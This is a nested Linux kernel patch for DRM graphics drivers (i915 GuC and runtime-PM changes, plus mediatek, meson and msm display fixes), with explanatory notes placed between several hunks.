++	 * within the same G2H handler task slot. This is very unlikely. However, if GuC really
++	 * does run out of space for whatever reason, we will see a separate warning message
++	 * when processing the G2H event capture-notification; search for:
++	 * INTEL_GUC_STATE_CAPTURE_EVENT_STATUS_NOSPACE.
++	 */
+ 	if (min_size < 0)
+ 		drm_warn(&i915->drm, "Failed to calculate GuC error state capture buffer minimum size: %d!\n",
+ 			 min_size);
+ 	else if (min_size > buffer_size)
+-		drm_warn(&i915->drm, "GuC error state capture buffer is too small: %d < %d\n",
++		drm_warn(&i915->drm, "GuC error state capture buffer may be too small: %d < %d\n",
+ 			 buffer_size, min_size);
+ 	else if (spare_size > buffer_size)
+-		drm_notice(&i915->drm, "GuC error state capture buffer maybe too small: %d < %d (min = %d)\n",
+-			   buffer_size, spare_size, min_size);
++		drm_dbg(&i915->drm, "GuC error state capture buffer lacks spare size: %d < %d (min = %d)\n",
++			buffer_size, spare_size, min_size);
+ }
+ 
+ /*
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_fwif.h b/drivers/gpu/drm/i915/gt/uc/intel_guc_fwif.h
+index 323b055e5db97..502e7cb5a3025 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_fwif.h
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_fwif.h
+@@ -305,6 +305,27 @@ struct guc_update_context_policy {
+ 
+ #define GLOBAL_POLICY_DEFAULT_DPC_PROMOTE_TIME_US 500000
+ 
++/*
++ * GuC converts the timeout to clock ticks internally. Different platforms have
++ * different GuC clocks. Thus, the maximum value before overflow is platform
++ * dependent. The current worst case is about 110s, so the spec says to
++ * limit it to 100s to be safe.
++ */
++#define GUC_POLICY_MAX_EXEC_QUANTUM_US		(100 * 1000 * 1000UL)
++#define GUC_POLICY_MAX_PREEMPT_TIMEOUT_US	(100 * 1000 * 1000UL)
++
++static inline u32 guc_policy_max_exec_quantum_ms(void)
++{
++	BUILD_BUG_ON(GUC_POLICY_MAX_EXEC_QUANTUM_US >= UINT_MAX);
++	return GUC_POLICY_MAX_EXEC_QUANTUM_US / 1000;
++}
++
++static inline u32 guc_policy_max_preempt_timeout_ms(void)
++{
++	BUILD_BUG_ON(GUC_POLICY_MAX_PREEMPT_TIMEOUT_US >= UINT_MAX);
++	return GUC_POLICY_MAX_PREEMPT_TIMEOUT_US / 1000;
++}
++
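
Worked numbers behind these limits (the clock figure is inferred from the
110s worst case, not taken from the GuC interface spec):

    /* 100 * 1000 * 1000UL = 100000000 us, well below UINT_MAX
     * (4294967295), so the BUILD_BUG_ON() checks pass and both
     * helpers return 100000000 / 1000 = 100000 ms. A 32-bit tick
     * counter overflowing at ~110s implies a worst-case GuC clock
     * of roughly 2^32 / 110 ~= 39 MHz. */
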
+ struct guc_policies {
+ 	u32 submission_queue_depth[GUC_MAX_ENGINE_CLASSES];
+ 	/* In micro seconds. How much time to allow before DPC processing is
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_log.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_log.c
+index 55d3ef93e86f8..68331c538b0a7 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_log.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_log.c
+@@ -16,15 +16,15 @@
+ #if defined(CONFIG_DRM_I915_DEBUG_GUC)
+ #define GUC_LOG_DEFAULT_CRASH_BUFFER_SIZE	SZ_2M
+ #define GUC_LOG_DEFAULT_DEBUG_BUFFER_SIZE	SZ_16M
+-#define GUC_LOG_DEFAULT_CAPTURE_BUFFER_SIZE	SZ_4M
++#define GUC_LOG_DEFAULT_CAPTURE_BUFFER_SIZE	SZ_1M
+ #elif defined(CONFIG_DRM_I915_DEBUG_GEM)
+ #define GUC_LOG_DEFAULT_CRASH_BUFFER_SIZE	SZ_1M
+ #define GUC_LOG_DEFAULT_DEBUG_BUFFER_SIZE	SZ_2M
+-#define GUC_LOG_DEFAULT_CAPTURE_BUFFER_SIZE	SZ_4M
++#define GUC_LOG_DEFAULT_CAPTURE_BUFFER_SIZE	SZ_1M
+ #else
+ #define GUC_LOG_DEFAULT_CRASH_BUFFER_SIZE	SZ_8K
+ #define GUC_LOG_DEFAULT_DEBUG_BUFFER_SIZE	SZ_64K
+-#define GUC_LOG_DEFAULT_CAPTURE_BUFFER_SIZE	SZ_2M
++#define GUC_LOG_DEFAULT_CAPTURE_BUFFER_SIZE	SZ_1M
+ #endif
+ 
+ static void guc_log_copy_debuglogs_for_relay(struct intel_guc_log *log);
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
+index 1db59eeb34db9..1a23e901cc663 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
+@@ -2429,6 +2429,10 @@ static int guc_context_policy_init_v70(struct intel_context *ce, bool loop)
+ 	int ret;
+ 
+ 	/* NB: For both of these, zero means disabled. */
++	GEM_BUG_ON(overflows_type(engine->props.timeslice_duration_ms * 1000,
++				  execution_quantum));
++	GEM_BUG_ON(overflows_type(engine->props.preempt_timeout_ms * 1000,
++				  preemption_timeout));
+ 	execution_quantum = engine->props.timeslice_duration_ms * 1000;
+ 	preemption_timeout = engine->props.preempt_timeout_ms * 1000;
+ 
+@@ -2462,6 +2466,10 @@ static void guc_context_policy_init_v69(struct intel_engine_cs *engine,
+ 		desc->policy_flags |= CONTEXT_POLICY_FLAG_PREEMPT_TO_IDLE_V69;
+ 
+ 	/* NB: For both of these, zero means disabled. */
++	GEM_BUG_ON(overflows_type(engine->props.timeslice_duration_ms * 1000,
++				  desc->execution_quantum));
++	GEM_BUG_ON(overflows_type(engine->props.preempt_timeout_ms * 1000,
++				  desc->preemption_timeout));
+ 	desc->execution_quantum = engine->props.timeslice_duration_ms * 1000;
+ 	desc->preemption_timeout = engine->props.preempt_timeout_ms * 1000;
+ }
+diff --git a/drivers/gpu/drm/i915/i915_driver.c b/drivers/gpu/drm/i915/i915_driver.c
+index f2a15d8155f4a..2ce30cff461a0 100644
+--- a/drivers/gpu/drm/i915/i915_driver.c
++++ b/drivers/gpu/drm/i915/i915_driver.c
+@@ -1662,7 +1662,8 @@ static int intel_runtime_suspend(struct device *kdev)
+ 
+ 		intel_runtime_pm_enable_interrupts(dev_priv);
+ 
+-		intel_gt_runtime_resume(to_gt(dev_priv));
++		for_each_gt(gt, dev_priv, i)
++			intel_gt_runtime_resume(gt);
+ 
+ 		enable_rpm_wakeref_asserts(rpm);
+ 
+diff --git a/drivers/gpu/drm/i915/i915_gem.c b/drivers/gpu/drm/i915/i915_gem.c
+index 2bdddb61ebd7a..38c26668b9602 100644
+--- a/drivers/gpu/drm/i915/i915_gem.c
++++ b/drivers/gpu/drm/i915/i915_gem.c
+@@ -843,7 +843,7 @@ void i915_gem_runtime_suspend(struct drm_i915_private *i915)
+ 		__i915_gem_object_release_mmap_gtt(obj);
+ 
+ 	list_for_each_entry_safe(obj, on,
+-				 &to_gt(i915)->lmem_userfault_list, userfault_link)
++				 &i915->runtime_pm.lmem_userfault_list, userfault_link)
+ 		i915_gem_object_runtime_pm_release_mmap_offset(obj);
+ 
+ 	/*
+@@ -1128,6 +1128,8 @@ void i915_gem_drain_workqueue(struct drm_i915_private *i915)
+ 
+ int i915_gem_init(struct drm_i915_private *dev_priv)
+ {
++	struct intel_gt *gt;
++	unsigned int i;
+ 	int ret;
+ 
+ 	/* We need to fallback to 4K pages if host doesn't support huge gtt. */
+@@ -1158,9 +1160,11 @@ int i915_gem_init(struct drm_i915_private *dev_priv)
+ 	 */
+ 	intel_init_clock_gating(dev_priv);
+ 
+-	ret = intel_gt_init(to_gt(dev_priv));
+-	if (ret)
+-		goto err_unlock;
++	for_each_gt(gt, dev_priv, i) {
++		ret = intel_gt_init(gt);
++		if (ret)
++			goto err_unlock;
++	}
+ 
+ 	return 0;
+ 
+@@ -1173,8 +1177,13 @@ int i915_gem_init(struct drm_i915_private *dev_priv)
+ err_unlock:
+ 	i915_gem_drain_workqueue(dev_priv);
+ 
+-	if (ret != -EIO)
+-		intel_uc_cleanup_firmwares(&to_gt(dev_priv)->uc);
++	if (ret != -EIO) {
++		for_each_gt(gt, dev_priv, i) {
++			intel_gt_driver_remove(gt);
++			intel_gt_driver_release(gt);
++			intel_uc_cleanup_firmwares(&gt->uc);
++		}
++	}
+ 
+ 	if (ret == -EIO) {
+ 		/*
+@@ -1182,10 +1191,12 @@ err_unlock:
+ 		 * as wedged. But we only want to do this when the GPU is angry,
+ 		 * for all other failure, such as an allocation failure, bail.
+ 		 */
+-		if (!intel_gt_is_wedged(to_gt(dev_priv))) {
+-			i915_probe_error(dev_priv,
+-					 "Failed to initialize GPU, declaring it wedged!\n");
+-			intel_gt_set_wedged(to_gt(dev_priv));
++		for_each_gt(gt, dev_priv, i) {
++			if (!intel_gt_is_wedged(gt)) {
++				i915_probe_error(dev_priv,
++						 "Failed to initialize GPU, declaring it wedged!\n");
++				intel_gt_set_wedged(gt);
++			}
+ 		}
+ 
+ 		/* Minimal basic recovery for KMS */
+@@ -1213,10 +1224,12 @@ void i915_gem_driver_unregister(struct drm_i915_private *i915)
+ 
+ void i915_gem_driver_remove(struct drm_i915_private *dev_priv)
+ {
+-	intel_wakeref_auto_fini(&to_gt(dev_priv)->userfault_wakeref);
++	struct intel_gt *gt;
++	unsigned int i;
+ 
+ 	i915_gem_suspend_late(dev_priv);
+-	intel_gt_driver_remove(to_gt(dev_priv));
++	for_each_gt(gt, dev_priv, i)
++		intel_gt_driver_remove(gt);
+ 	dev_priv->uabi_engines = RB_ROOT;
+ 
+ 	/* Flush any outstanding unpin_work. */
+@@ -1227,9 +1240,13 @@ void i915_gem_driver_remove(struct drm_i915_private *dev_priv)
+ 
+ void i915_gem_driver_release(struct drm_i915_private *dev_priv)
+ {
+-	intel_gt_driver_release(to_gt(dev_priv));
++	struct intel_gt *gt;
++	unsigned int i;
+ 
+-	intel_uc_cleanup_firmwares(&to_gt(dev_priv)->uc);
++	for_each_gt(gt, dev_priv, i) {
++		intel_gt_driver_release(gt);
++		intel_uc_cleanup_firmwares(&gt->uc);
++	}
+ 
+ 	/* Flush any outstanding work, including i915_gem_context.release_work. */
+ 	i915_gem_drain_workqueue(dev_priv);
+diff --git a/drivers/gpu/drm/i915/intel_runtime_pm.c b/drivers/gpu/drm/i915/intel_runtime_pm.c
+index 744cca507946b..129746713d072 100644
+--- a/drivers/gpu/drm/i915/intel_runtime_pm.c
++++ b/drivers/gpu/drm/i915/intel_runtime_pm.c
+@@ -633,6 +633,8 @@ void intel_runtime_pm_driver_release(struct intel_runtime_pm *rpm)
+ 						     runtime_pm);
+ 	int count = atomic_read(&rpm->wakeref_count);
+ 
++	intel_wakeref_auto_fini(&rpm->userfault_wakeref);
++
+ 	drm_WARN(&i915->drm, count,
+ 		 "i915 raw-wakerefs=%d wakelocks=%d on cleanup\n",
+ 		 intel_rpm_raw_wakeref_count(count),
+@@ -652,4 +654,7 @@ void intel_runtime_pm_init_early(struct intel_runtime_pm *rpm)
+ 	rpm->available = HAS_RUNTIME_PM(i915);
+ 
+ 	init_intel_runtime_pm_wakeref(rpm);
++	INIT_LIST_HEAD(&rpm->lmem_userfault_list);
++	spin_lock_init(&rpm->lmem_userfault_lock);
++	intel_wakeref_auto_init(&rpm->userfault_wakeref, rpm);
+ }
+diff --git a/drivers/gpu/drm/i915/intel_runtime_pm.h b/drivers/gpu/drm/i915/intel_runtime_pm.h
+index d9160e3ff4afc..98b8b28baaa15 100644
+--- a/drivers/gpu/drm/i915/intel_runtime_pm.h
++++ b/drivers/gpu/drm/i915/intel_runtime_pm.h
+@@ -53,6 +53,28 @@ struct intel_runtime_pm {
+ 	bool irqs_enabled;
+ 	bool no_wakeref_tracking;
+ 
++	/*
++	 *  Protects access to the lmem userfault list.
++	 *  If we are outside of the runtime suspend path, access to
++	 *  @lmem_userfault_list always requires first grabbing the
++	 *  runtime pm wakeref, to ensure we can't race against runtime suspend.
++	 *  Once we have that we also need to grab @lmem_userfault_lock,
++	 *  at which point we have exclusive access.
++	 *  The runtime suspend path is special since it doesn't really hold any locks,
++	 *  but instead has exclusive access by virtue of all other accesses requiring
++	 *  holding the runtime pm wakeref.
++	 */
++	spinlock_t lmem_userfault_lock;
++
++	/*
++	 *  List of userfaulted gem objects which need to release their
++	 *  mmap mappings in the runtime suspend path.
++	 */
++	struct list_head lmem_userfault_list;
++
++	/* Manual runtime pm autosuspend delay for user GGTT/lmem mmaps */
++	struct intel_wakeref_auto userfault_wakeref;
++
+ #if IS_ENABLED(CONFIG_DRM_I915_DEBUG_RUNTIME_PM)
+ 	/*
+ 	 * To aide detection of wakeref leaks and general misuse, we
+diff --git a/drivers/gpu/drm/mediatek/mtk_dpi.c b/drivers/gpu/drm/mediatek/mtk_dpi.c
+index 508a6d994e831..1f5d39a4077cd 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dpi.c
++++ b/drivers/gpu/drm/mediatek/mtk_dpi.c
+@@ -461,9 +461,6 @@ static void mtk_dpi_power_off(struct mtk_dpi *dpi)
+ 	if (--dpi->refcount != 0)
+ 		return;
+ 
+-	if (dpi->pinctrl && dpi->pins_gpio)
+-		pinctrl_select_state(dpi->pinctrl, dpi->pins_gpio);
+-
+ 	mtk_dpi_disable(dpi);
+ 	clk_disable_unprepare(dpi->pixel_clk);
+ 	clk_disable_unprepare(dpi->engine_clk);
+@@ -488,9 +485,6 @@ static int mtk_dpi_power_on(struct mtk_dpi *dpi)
+ 		goto err_pixel;
+ 	}
+ 
+-	if (dpi->pinctrl && dpi->pins_dpi)
+-		pinctrl_select_state(dpi->pinctrl, dpi->pins_dpi);
+-
+ 	return 0;
+ 
+ err_pixel:
+@@ -721,12 +715,18 @@ static void mtk_dpi_bridge_disable(struct drm_bridge *bridge)
+ 	struct mtk_dpi *dpi = bridge_to_dpi(bridge);
+ 
+ 	mtk_dpi_power_off(dpi);
++
++	if (dpi->pinctrl && dpi->pins_gpio)
++		pinctrl_select_state(dpi->pinctrl, dpi->pins_gpio);
+ }
+ 
+ static void mtk_dpi_bridge_enable(struct drm_bridge *bridge)
+ {
+ 	struct mtk_dpi *dpi = bridge_to_dpi(bridge);
+ 
++	if (dpi->pinctrl && dpi->pins_dpi)
++		pinctrl_select_state(dpi->pinctrl, dpi->pins_dpi);
++
+ 	mtk_dpi_power_on(dpi);
+ 	mtk_dpi_set_display_mode(dpi, &dpi->mode);
+ 	mtk_dpi_enable(dpi);
+diff --git a/drivers/gpu/drm/mediatek/mtk_hdmi.c b/drivers/gpu/drm/mediatek/mtk_hdmi.c
+index 4c80b6896dc3d..6e8f99554f548 100644
+--- a/drivers/gpu/drm/mediatek/mtk_hdmi.c
++++ b/drivers/gpu/drm/mediatek/mtk_hdmi.c
+@@ -1202,9 +1202,10 @@ static enum drm_connector_status mtk_hdmi_detect(struct mtk_hdmi *hdmi)
+ 	return mtk_hdmi_update_plugged_status(hdmi);
+ }
+ 
+-static int mtk_hdmi_bridge_mode_valid(struct drm_bridge *bridge,
+-				      const struct drm_display_info *info,
+-				      const struct drm_display_mode *mode)
++static enum drm_mode_status
++mtk_hdmi_bridge_mode_valid(struct drm_bridge *bridge,
++			   const struct drm_display_info *info,
++			   const struct drm_display_mode *mode)
+ {
+ 	struct mtk_hdmi *hdmi = hdmi_ctx_from_bridge(bridge);
+ 	struct drm_bridge *next_bridge;
+diff --git a/drivers/gpu/drm/meson/meson_encoder_cvbs.c b/drivers/gpu/drm/meson/meson_encoder_cvbs.c
+index 5675bc2a92cf8..3f73b211fa8e3 100644
+--- a/drivers/gpu/drm/meson/meson_encoder_cvbs.c
++++ b/drivers/gpu/drm/meson/meson_encoder_cvbs.c
+@@ -116,9 +116,10 @@ static int meson_encoder_cvbs_get_modes(struct drm_bridge *bridge,
+ 	return i;
+ }
+ 
+-static int meson_encoder_cvbs_mode_valid(struct drm_bridge *bridge,
+-					const struct drm_display_info *display_info,
+-					const struct drm_display_mode *mode)
++static enum drm_mode_status
++meson_encoder_cvbs_mode_valid(struct drm_bridge *bridge,
++			      const struct drm_display_info *display_info,
++			      const struct drm_display_mode *mode)
+ {
+ 	if (meson_cvbs_get_mode(mode))
+ 		return MODE_OK;
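
This and the mtk_hdmi change above fix the same mismatch: drm_bridge_funcs
declares this callback as returning enum drm_mode_status, so an int-returning
implementation trips prototype and CFI checking even though the enumerator
values are small integers. The expected signature, from <drm/drm_bridge.h>:

    enum drm_mode_status (*mode_valid)(struct drm_bridge *bridge,
                                       const struct drm_display_info *info,
                                       const struct drm_display_mode *mode);
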
+diff --git a/drivers/gpu/drm/msm/adreno/a6xx_gpu.c b/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
+index fdc578016e0bf..e846e629c00d8 100644
+--- a/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
+@@ -1906,7 +1906,7 @@ static u32 fuse_to_supp_hw(struct device *dev, struct adreno_rev rev, u32 fuse)
+ 
+ 	if (val == UINT_MAX) {
+ 		DRM_DEV_ERROR(dev,
+-			"missing support for speed-bin: %u. Some OPPs may not be supported by hardware",
++			"missing support for speed-bin: %u. Some OPPs may not be supported by hardware\n",
+ 			fuse);
+ 		return UINT_MAX;
+ 	}
+@@ -1916,7 +1916,7 @@ static u32 fuse_to_supp_hw(struct device *dev, struct adreno_rev rev, u32 fuse)
+ 
+ static int a6xx_set_supported_hw(struct device *dev, struct adreno_rev rev)
+ {
+-	u32 supp_hw = UINT_MAX;
++	u32 supp_hw;
+ 	u32 speedbin;
+ 	int ret;
+ 
+@@ -1928,15 +1928,13 @@ static int a6xx_set_supported_hw(struct device *dev, struct adreno_rev rev)
+ 	if (ret == -ENOENT) {
+ 		return 0;
+ 	} else if (ret) {
+-		DRM_DEV_ERROR(dev,
+-			      "failed to read speed-bin (%d). Some OPPs may not be supported by hardware",
+-			      ret);
+-		goto done;
++		dev_err_probe(dev, ret,
++			      "failed to read speed-bin. Some OPPs may not be supported by hardware\n");
++		return ret;
+ 	}
+ 
+ 	supp_hw = fuse_to_supp_hw(dev, rev, speedbin);
+ 
+-done:
+ 	ret = devm_pm_opp_set_supported_hw(dev, &supp_hw, 1);
+ 	if (ret)
+ 		return ret;
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_dsc.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_dsc.c
+index f2ddcfb6f7ee6..3662df698dae5 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_dsc.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_dsc.c
+@@ -42,7 +42,7 @@ static void dpu_hw_dsc_config(struct dpu_hw_dsc *hw_dsc,
+ 			      u32 initial_lines)
+ {
+ 	struct dpu_hw_blk_reg_map *c = &hw_dsc->hw;
+-	u32 data, lsb, bpp;
++	u32 data;
+ 	u32 slice_last_group_size;
+ 	u32 det_thresh_flatness;
+ 	bool is_cmd_mode = !(mode & DSC_MODE_VIDEO);
+@@ -56,14 +56,7 @@ static void dpu_hw_dsc_config(struct dpu_hw_dsc *hw_dsc,
+ 	data = (initial_lines << 20);
+ 	data |= ((slice_last_group_size - 1) << 18);
+ 	/* bpp is 6.4 format, 4 LSBs are for the fractional part */
+-	data |= dsc->bits_per_pixel << 12;
+-	lsb = dsc->bits_per_pixel % 4;
+-	bpp = dsc->bits_per_pixel / 4;
+-	bpp *= 4;
+-	bpp <<= 4;
+-	bpp |= lsb;
+-
+-	data |= bpp << 8;
++	data |= (dsc->bits_per_pixel << 8);
+ 	data |= (dsc->block_pred_enable << 7);
+ 	data |= (dsc->line_buf_depth << 3);
+ 	data |= (dsc->simple_422 << 2);
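
The deleted arithmetic split bits_per_pixel into integer and fractional
nibbles only to reassemble the same bit pattern, and also ORed the raw value
in a second time at bit 12. Since drm_dsc_config stores bits_per_pixel in
6.4 fixed point already, a single shift places the field; worked example for
8 bpp:

    u32 bpp = 8 << 4;    /* 8.0 bpp in 6.4 fixed point = 0x80 */
    data |= bpp << 8;    /* 10-bit bpp field at bits 17:8 */
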
+diff --git a/drivers/gpu/drm/msm/disp/mdp5/mdp5_kms.c b/drivers/gpu/drm/msm/disp/mdp5/mdp5_kms.c
+index b0d21838a1343..29ae5c9613f36 100644
+--- a/drivers/gpu/drm/msm/disp/mdp5/mdp5_kms.c
++++ b/drivers/gpu/drm/msm/disp/mdp5/mdp5_kms.c
+@@ -203,7 +203,7 @@ static int mdp5_set_split_display(struct msm_kms *kms,
+ 							  slave_encoder);
+ }
+ 
+-static void mdp5_destroy(struct platform_device *pdev);
++static void mdp5_destroy(struct mdp5_kms *mdp5_kms);
+ 
+ static void mdp5_kms_destroy(struct msm_kms *kms)
+ {
+@@ -223,7 +223,7 @@ static void mdp5_kms_destroy(struct msm_kms *kms)
+ 	}
+ 
+ 	mdp_kms_destroy(&mdp5_kms->base);
+-	mdp5_destroy(mdp5_kms->pdev);
++	mdp5_destroy(mdp5_kms);
+ }
+ 
+ #ifdef CONFIG_DEBUG_FS
+@@ -559,6 +559,8 @@ static int mdp5_kms_init(struct drm_device *dev)
+ 	int irq, i, ret;
+ 
+ 	ret = mdp5_init(to_platform_device(dev->dev), dev);
++	if (ret)
++		return ret;
+ 
+ 	/* priv->kms would have been populated by the MDP5 driver */
+ 	kms = priv->kms;
+@@ -632,9 +634,8 @@ fail:
+ 	return ret;
+ }
+ 
+-static void mdp5_destroy(struct platform_device *pdev)
++static void mdp5_destroy(struct mdp5_kms *mdp5_kms)
+ {
+-	struct mdp5_kms *mdp5_kms = platform_get_drvdata(pdev);
+ 	int i;
+ 
+ 	if (mdp5_kms->ctlm)
+@@ -648,7 +649,7 @@ static void mdp5_destroy(struct platform_device *pdev)
+ 		kfree(mdp5_kms->intfs[i]);
+ 
+ 	if (mdp5_kms->rpm_enabled)
+-		pm_runtime_disable(&pdev->dev);
++		pm_runtime_disable(&mdp5_kms->pdev->dev);
+ 
+ 	drm_atomic_private_obj_fini(&mdp5_kms->glob_state);
+ 	drm_modeset_lock_fini(&mdp5_kms->glob_state_lock);
+@@ -797,8 +798,6 @@ static int mdp5_init(struct platform_device *pdev, struct drm_device *dev)
+ 		goto fail;
+ 	}
+ 
+-	platform_set_drvdata(pdev, mdp5_kms);
+-
+ 	spin_lock_init(&mdp5_kms->resource_lock);
+ 
+ 	mdp5_kms->dev = dev;
+@@ -839,6 +838,9 @@ static int mdp5_init(struct platform_device *pdev, struct drm_device *dev)
+ 	 */
+ 	clk_set_rate(mdp5_kms->core_clk, 200000000);
+ 
++	/* set uninit-ed kms */
++	priv->kms = &mdp5_kms->base.base;
++
+ 	pm_runtime_enable(&pdev->dev);
+ 	mdp5_kms->rpm_enabled = true;
+ 
+@@ -890,13 +892,10 @@ static int mdp5_init(struct platform_device *pdev, struct drm_device *dev)
+ 	if (ret)
+ 		goto fail;
+ 
+-	/* set uninit-ed kms */
+-	priv->kms = &mdp5_kms->base.base;
+-
+ 	return 0;
+ fail:
+ 	if (mdp5_kms)
+-		mdp5_destroy(pdev);
++		mdp5_destroy(mdp5_kms);
+ 	return ret;
+ }
+ 
+@@ -953,7 +952,8 @@ static int mdp5_dev_remove(struct platform_device *pdev)
+ static __maybe_unused int mdp5_runtime_suspend(struct device *dev)
+ {
+ 	struct platform_device *pdev = to_platform_device(dev);
+-	struct mdp5_kms *mdp5_kms = platform_get_drvdata(pdev);
++	struct msm_drm_private *priv = platform_get_drvdata(pdev);
++	struct mdp5_kms *mdp5_kms = to_mdp5_kms(to_mdp_kms(priv->kms));
+ 
+ 	DBG("");
+ 
+@@ -963,7 +963,8 @@ static __maybe_unused int mdp5_runtime_suspend(struct device *dev)
+ static __maybe_unused int mdp5_runtime_resume(struct device *dev)
+ {
+ 	struct platform_device *pdev = to_platform_device(dev);
+-	struct mdp5_kms *mdp5_kms = platform_get_drvdata(pdev);
++	struct msm_drm_private *priv = platform_get_drvdata(pdev);
++	struct mdp5_kms *mdp5_kms = to_mdp5_kms(to_mdp_kms(priv->kms));
+ 
+ 	DBG("");
+ 
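
After this change the platform drvdata holds the struct msm_drm_private
(presumably set by the msm core) rather than the mdp5_kms, so every lookup
goes through the kms pointer; moving the priv->kms assignment ahead of
pm_runtime_enable() in mdp5_init() ensures these callbacks can already
resolve it if they fire during probe:

    struct msm_drm_private *priv = platform_get_drvdata(pdev);
    struct mdp5_kms *mdp5_kms = to_mdp5_kms(to_mdp_kms(priv->kms));
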
+diff --git a/drivers/gpu/drm/msm/dp/dp_display.c b/drivers/gpu/drm/msm/dp/dp_display.c
+index a49f6dbbe8883..c9d9b384ddd03 100644
+--- a/drivers/gpu/drm/msm/dp/dp_display.c
++++ b/drivers/gpu/drm/msm/dp/dp_display.c
+@@ -857,7 +857,7 @@ static int dp_display_set_mode(struct msm_dp *dp_display,
+ 
+ 	dp = container_of(dp_display, struct dp_display_private, dp_display);
+ 
+-	dp->panel->dp_mode.drm_mode = mode->drm_mode;
++	drm_mode_copy(&dp->panel->dp_mode.drm_mode, &mode->drm_mode);
+ 	dp->panel->dp_mode.bpp = mode->bpp;
+ 	dp->panel->dp_mode.capabilities = mode->capabilities;
+ 	dp_panel_init_panel_info(dp->panel);
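
drm_mode_copy() is used instead of a plain struct assignment because struct
drm_display_mode embeds a list_head; copying the whole struct would overwrite
the destination's list linkage with the source's and corrupt whatever mode
list dp_mode.drm_mode sits on. Roughly what the helper does:

    void mode_copy_sketch(struct drm_display_mode *dst,
                          const struct drm_display_mode *src)
    {
            struct list_head head = dst->head;  /* preserve own linkage */

            *dst = *src;
            dst->head = head;
    }
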
+diff --git a/drivers/gpu/drm/msm/dsi/dsi_host.c b/drivers/gpu/drm/msm/dsi/dsi_host.c
+index 7fbf391c024f8..89aadd3b3202b 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi_host.c
++++ b/drivers/gpu/drm/msm/dsi/dsi_host.c
+@@ -21,6 +21,7 @@
+ 
+ #include <video/mipi_display.h>
+ 
++#include <drm/display/drm_dsc_helper.h>
+ #include <drm/drm_of.h>
+ 
+ #include "dsi.h"
+@@ -33,7 +34,7 @@
+ 
+ #define DSI_RESET_TOGGLE_DELAY_MS 20
+ 
+-static int dsi_populate_dsc_params(struct drm_dsc_config *dsc);
++static int dsi_populate_dsc_params(struct msm_dsi_host *msm_host, struct drm_dsc_config *dsc);
+ 
+ static int dsi_get_version(const void __iomem *base, u32 *major, u32 *minor)
+ {
+@@ -842,17 +843,15 @@ static void dsi_ctrl_config(struct msm_dsi_host *msm_host, bool enable,
+ static void dsi_update_dsc_timing(struct msm_dsi_host *msm_host, bool is_cmd_mode, u32 hdisplay)
+ {
+ 	struct drm_dsc_config *dsc = msm_host->dsc;
+-	u32 reg, intf_width, reg_ctrl, reg_ctrl2;
++	u32 reg, reg_ctrl, reg_ctrl2;
+ 	u32 slice_per_intf, total_bytes_per_intf;
+ 	u32 pkt_per_line;
+-	u32 bytes_in_slice;
+ 	u32 eol_byte_num;
+ 
+ 	/* first calculate dsc parameters and then program
+ 	 * compress mode registers
+ 	 */
+-	intf_width = hdisplay;
+-	slice_per_intf = DIV_ROUND_UP(intf_width, dsc->slice_width);
++	slice_per_intf = DIV_ROUND_UP(hdisplay, dsc->slice_width);
+ 
+ 	/* If slice_per_pkt is greater than slice_per_intf
+ 	 * then default to 1. This can happen during partial
+@@ -861,12 +860,7 @@ static void dsi_update_dsc_timing(struct msm_dsi_host *msm_host, bool is_cmd_mod
+ 	if (slice_per_intf > dsc->slice_count)
+ 		dsc->slice_count = 1;
+ 
+-	slice_per_intf = DIV_ROUND_UP(hdisplay, dsc->slice_width);
+-	bytes_in_slice = DIV_ROUND_UP(dsc->slice_width * dsc->bits_per_pixel, 8);
+-
+-	dsc->slice_chunk_size = bytes_in_slice;
+-
+-	total_bytes_per_intf = bytes_in_slice * slice_per_intf;
++	total_bytes_per_intf = dsc->slice_chunk_size * slice_per_intf;
+ 
+ 	eol_byte_num = total_bytes_per_intf % 3;
+ 	pkt_per_line = slice_per_intf / dsc->slice_count;
+@@ -892,7 +886,7 @@ static void dsi_update_dsc_timing(struct msm_dsi_host *msm_host, bool is_cmd_mod
+ 		reg_ctrl |= reg;
+ 
+ 		reg_ctrl2 &= ~DSI_COMMAND_COMPRESSION_MODE_CTRL2_STREAM0_SLICE_WIDTH__MASK;
+-		reg_ctrl2 |= DSI_COMMAND_COMPRESSION_MODE_CTRL2_STREAM0_SLICE_WIDTH(bytes_in_slice);
++		reg_ctrl2 |= DSI_COMMAND_COMPRESSION_MODE_CTRL2_STREAM0_SLICE_WIDTH(dsc->slice_chunk_size);
+ 
+ 		dsi_write(msm_host, REG_DSI_COMMAND_COMPRESSION_MODE_CTRL, reg_ctrl);
+ 		dsi_write(msm_host, REG_DSI_COMMAND_COMPRESSION_MODE_CTRL2, reg_ctrl2);
+@@ -915,6 +909,7 @@ static void dsi_timing_setup(struct msm_dsi_host *msm_host, bool is_bonded_dsi)
+ 	u32 va_end = va_start + mode->vdisplay;
+ 	u32 hdisplay = mode->hdisplay;
+ 	u32 wc;
++	int ret;
+ 
+ 	DBG("");
+ 
+@@ -950,7 +945,9 @@ static void dsi_timing_setup(struct msm_dsi_host *msm_host, bool is_bonded_dsi)
+ 		/* we do the calculations for dsc parameters here so that
+ 		 * panel can use these parameters
+ 		 */
+-		dsi_populate_dsc_params(dsc);
++		ret = dsi_populate_dsc_params(msm_host, dsc);
++		if (ret)
++			return;
+ 
+ 		/* Divide the display by 3 but keep back/font porch and
+ 		 * pulse width same
+@@ -1754,18 +1751,20 @@ static char bpg_offset[DSC_NUM_BUF_RANGES] = {
